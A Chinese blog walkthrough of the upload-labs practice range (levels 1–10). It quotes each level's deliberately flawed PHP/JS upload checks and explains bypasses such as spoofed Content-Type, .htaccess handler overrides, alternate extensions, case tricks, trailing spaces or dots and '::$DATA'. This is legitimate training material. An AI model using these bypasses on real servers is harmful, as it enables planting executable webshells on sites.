2. 程式人生 > 實用技巧 >upload - labs (上)

upload - labs (上)

阿新 發佈:2020-08-19

Pass - 01:

1.嘗試上傳一個php檔案:aaa.php,發現只允許上傳某些圖片型別,用bp抓包,發現http請求都沒通過burp就彈出了不允許上傳的提示框,這表明驗證點在前端,而不在服務端

2.按F12產看具體JS程式碼,發現checkFile()函式判斷上傳檔案型別,並在判斷函式中新增php或者刪掉該函式,或者瀏覽器禁用js後進行上傳

3.上傳成功,

關鍵原始碼:

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null
 
 || file == "") {
        alert("請選擇要上傳的檔案!");
        return false;
    }
    //定義允許上傳的檔案型別
    var allow_ext = ".jpg|.png|.gif";
    //提取上傳檔案的型別
    var ext_name = file.substring(file.lastIndexOf("."));
    //判斷上傳檔案型別是否允許上傳
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "該檔案不允許上傳,請上傳
 
" + allow_ext + "型別的檔案,當前檔案型別為:" + ext_name;
        alert(errMsg);
        return false;
    }
}

Pass - 02:

1.上傳一個php檔案,顯示檔案型別不正確,要求重新上傳,

2.檢視原始碼,發現只對Content-Type進行了過濾判斷,利用Burp Suite修改Content-Type型別為 image/jpeg進行修改繞過,

3.上傳成功,

關鍵原始碼:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    
 
if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '檔案型別不正確,請重新上傳!';
        }
    } else {
        $msg = UPLOAD_PATH.'資料夾不存在,請手工建立!';
    }
}

Pass - 03:

1.上傳一個php檔案,上傳失敗並出現回顯,

2.上傳aaa.php檔案並進行抓包,修改php字尾名,如php5,放行

3.上傳成功,

關鍵原始碼:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//刪除檔名末尾的點
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //轉換為小寫
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '不允許上傳.asp,.aspx,.php,.jsp字尾檔案!';
        }
    } else {
        $msg = UPLOAD_PATH . '資料夾不存在,請手工建立!';
    }
}

補充:

不允許上傳.asp,.aspx,.php,.jsp字尾檔案,但是可以上傳其他任意字尾。比如說:.phtml .phps .php5 .pht,但如果上傳的是.php5這種型別檔案的話,如果想要被當成php執行的話,需要有個前提條件,即Apache的httpd.conf有如下配置程式碼 
AddType application/x-httpd-php .php .phtml .phps .php5 .pht

AddType 指令:

AddType 指令
作用:在給定的副檔名與特定的內容型別之間建立對映
語法:AddType MIME-type extension [extension] ...
AddType指令在給定的副檔名與特定的內容型別之間建立對映關係。MIME-type指明瞭包含extension副檔名的檔案的媒體型別。
AddType 是與型別表相關的,描述的是副檔名與檔案型別之間的關係。
此處黑名單沒有過濾.htaccess字尾,故此處也可上傳.htaccess檔案進行繞過。
注: .htaccess檔案生效前提條件為1.mod_rewrite模組開啟。2.AllowOverride All 
.htaccess檔案是Apache伺服器中的一個配置檔案,它負責相關目錄下的網頁配置。
通過htaccess檔案,可以實現:網頁301重定向、自定義404錯誤頁面、改變副檔名、允許/阻止特定的使用者或者目錄的訪問、禁止目錄列表、配置預設文件等功能IIS平臺上不存在該檔案,該檔案預設開啟,啟用和關閉在httpd.conf檔案中配置。
構造.htaccess檔案,內容如下:AddType application/x-httpd-php .jpg
這裡程式碼的意思可以讓 .jpg字尾名檔案格式的檔名以php格式解析,因此達到了可執行的效果。所以我們可以把要上傳的php檔案的字尾名改為.jpg格式從而繞過

Pass - 04:

1.上傳php檔案,發現不允許,檢視提示,過濾了大部分的檔案字尾,

2.利用.htacess繞過,建立以此為字尾的檔案並寫入以下內容,

SetHandler application/x-httpd-php

3.然後所有檔案都會解析為php檔案,上傳圖片馬,上傳成功,

關鍵程式碼:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//刪除檔名末尾的點
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //轉換為小寫
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此檔案不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '資料夾不存在,請手工建立!';
    }
}

Pass - 05:

1.上傳php檔案,上傳失敗,

2.觀察原始碼發現多了.htacess過濾,但此處程式碼沒有將檔名統一轉成小寫,故可以通過大小寫繞過

3.上傳成功

關鍵程式碼:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//刪除檔名末尾的點
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //轉換為小寫
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此檔案型別不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '資料夾不存在,請手工建立!';
    }
}

Pass - 06:

1.上傳php檔案,不允許上傳,

2.產看原始碼,將檔案字尾名統一進行了小寫轉換,但是沒有去除檔名首尾的空格。所以此處可以利用windows系統的命名規則進行繞過

Win下xx.jpg[空格] 或xx.jpg.這兩類檔案都是不允許存在的,若這樣命名,windows會預設除去空格或點
此處會刪除末尾的點,但是沒有去掉末尾的空格,因此上傳一個.php[空格]檔案即可

3.上傳成功

關鍵程式碼:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//刪除檔名末尾的點
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此檔案型別不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '資料夾不存在,請手工建立!';
    }
}

Pass - 07:

1.檢視原始碼,發現相比於Pass-06程式碼,加上了首尾去空,但是卻少了尾部去點。故和上面Pass-06一樣,利用windows檔案命名規則繞過。

2.上傳成功

關鍵程式碼:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//刪除檔名末尾的點
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //轉換為小寫
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此檔案不允許上傳';
        }
    } else {
        $msg = UPLOAD_PATH . '資料夾不存在,請手工建立!';
    }
}

Pass - 08:

1.檢視原始碼,是黑名單過濾,但是沒有對字尾名進行去”::$DATA”處理,利用windows特性,可在後綴名中加” ::$DATA”繞過:

2.上傳成功

關鍵程式碼:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //轉換為小寫
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此檔案型別不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '資料夾不存在,請手工建立!';
    }
} 

補充:

在php+windows的情況下:如果檔名+"::$DATA"會把::$DATA之後的資料當成檔案流處理,不會檢測字尾名.且保持"::$DATA"之前的檔名。

Pass - 09:

1.檢視原始碼,這裡的程式碼邏輯是先刪除檔名末尾的點,再進行首尾去空。都只進行一次。故可以構造點空格點進行繞過,也就是字尾名改為aaa.php. .,也是利用了Windows的特性。

(從第三關到第九關,如果目標伺服器是windows系統的話,均可用點空格點繞過。)

2.上傳成功,

關鍵程式碼:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//刪除檔名末尾的點
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //轉換為小寫
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此檔案型別不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '資料夾不存在,請手工建立!';
    }
}

Pass - 10:

同Pass - 09。

關鍵程式碼:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//刪除檔名末尾的點
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //轉換為小寫
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此檔案型別不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '資料夾不存在,請手工建立!';
    }
}

相關推薦

upload - labs ()

Pass - 01: 1.嘗試傳一個php檔案:aaa.php,發現只允許傳某些圖片型別,用bp抓包,發現http請求都沒通過burp就彈出了不允許傳的提示框,這表明驗證點在前端,而不在服務端

檔案傳漏洞:upload-labs(二)

Pass-11 原始碼 $is_upload = false; $msg = null; if(isset($_POST[\'submit\'])){ $ext_arr = array(\'jpg\',\'png\',\'gif\');

Upload-labs 檔案傳靶場通關攻略(下)

Upload-Labs靶場攻略(下) Pass-11 GET型傳參,傳目錄可設定,考慮00截斷,在/upload/後新增1.php%00,即可

upload labs檔案

靶場搭建 配置項 配置 描述 作業系統 Window or Linux 推薦使用Windows,除了Pass-19必須在linux下,其餘Pass都可以在Windows執行

檔案upload-labs Pass 11-1

Pass11 審計原始碼 $is_upload = false; $msg = null; if(isset($_POST[\'submit\'])){ $ext_arr = array(\'jpg\',\'png\',\'gif\');

檔案upload-labs Pass-17 二次渲染

Pass-17 審計原始碼 $is_upload = false; $msg = null; if (isset($_POST[\'submit\'])){ // 獲得傳檔案的基本資訊,檔名,型別,大小,臨時檔案路徑

檔案upload-labs Pass-18 條件競爭

Pass-18 條件競爭 審計原始碼 $is_upload = false; $msg = null; if(isset($_POST[\'submit\'])){ $ext_arr = array(\'jpg\',\'png\',\'gif\');

檔案傳靶場upload-labs實戰

前言 來具體學習一下檔案傳的相關知識,參考教程:https://blog.csdn.net/qq_43390703/article/details/104858705,dalao寫的很全面了,後續我應該還會再補一個傳user.ini配置檔案的。

DVWA—File Upload 檔案

Low 原始碼: <?php if( isset( $_POST[ \'Upload\' ] ) ) { // Where are we going to be writing to? $target_path= DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

Upload-labs-11-20

0x11 pass-11 原始碼: $is_upload = false; $msg = null; if(isset($_POST[\'submit\'])){ $ext_arr = array(\'jpg\',\'png\',\'gif\');

upload - labs (下)

Pass - 11: 1.檢視原始碼,發現進行了一次對字尾名替換成空格,因此考慮雙寫繞過,

ant-design-vue 之upload 檔案

ant-design-vue 之upload 檔案傳 01) 單檔案傳 使用:before-upload=\"beforeUpload\"和@change=\"handleChange\"

DVWA 通關指南:File Upload(檔案傳)

目錄File Upload(檔案傳)Low Level原始碼審計攻擊方式原始碼審計攻擊方式High Level原始碼審計攻擊方式Impossible Level總結參考資料

Upload-labs-master筆記

Upload-labs-master筆記 防禦方法: 白名單限制Content-type 黑名單限制少部分傳的字尾

DVWA靶場——File Upload(檔案傳)

概述 檔案傳功能在web應用系統很常見,比如很多網站註冊的時候需要傳頭像、傳附件等等。當用戶點選傳按鈕後,後臺會對傳的檔案進行判斷 比如是否是指定的型別、字尾名、大小等等,然後將其按照設計的格式進

Upload-Labs-Pass-03

Upload-Labs-Pass-03 我們首先嚐試直接注入在此提示不允許傳.asp,.aspx,.php,.jsp字尾檔案。 通過提示我們可以得知在這裡我們需要使用檔案字尾繞過的方式來傳。

Upload-Labs-Pass-02

Upload-Labs-Pass-02 首先我們還是嘗試直接傳小馬在此提示檔案型別不正確 在這裡需要使用檔案型別繞過的方法:在客戶端傳檔案時,通過burp進行抓包,將資料包中的Content-Type修改為所傳檔案對應的值

Upload-Labs-Pass-01

Upload-Labs-Pass-01 我們嘗試直接傳小馬, 建立一個木馬檔案進行傳提示到該檔案不允許被傳,在這裡我們可以知道這裡是利用了js檢測,此時傳檔案的資料包並沒有傳到服務端,只是在客戶端瀏覽器使

Upload-Labs-Pass-04

Upload-Labs-Pass-04 我們依然是直接嘗試傳php檔案提示顯示此檔案不允許被

ant design中upload元件傳大檔案,顯示進度條進度的例項

Upload元件是自帶傳進度,但是樣式調起來很麻煩,我們要做的就是自定義一個